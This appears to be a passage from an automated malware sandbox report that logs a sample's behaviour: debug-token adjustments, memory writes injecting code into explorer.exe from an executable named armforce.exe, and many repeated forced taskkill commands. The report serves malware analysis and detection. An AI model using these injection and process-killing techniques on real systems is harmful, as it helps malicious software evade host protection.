Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects code into the Windows Explorer (explorer.exe)Show sources
Source: C:\inst_fold\armforce.exeMemory written: PID: 4092 base: 50000 value: 01
Source: C:\inst_fold\armforce.exeMemory written: PID: 4092 base: 50020 value: 9A
Source: C:\inst_fold\armforce.exeMemory written: PID: 4092 base: 7FFDF238 value: 00
Uses taskkill to terminate processesShow sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
